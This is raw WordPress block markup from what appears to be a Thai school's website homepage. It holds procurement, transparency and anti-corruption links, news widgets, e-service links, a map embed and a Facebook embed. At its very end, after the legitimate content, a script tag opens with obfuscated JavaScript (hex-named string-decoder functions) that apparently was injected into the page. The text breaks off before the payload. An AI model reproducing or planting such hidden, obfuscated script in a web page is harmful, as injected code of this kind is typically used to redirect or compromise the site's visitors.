style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"6fd1fd-18\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab6fd1fd-18\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"281735-c8\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab281735-c8\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 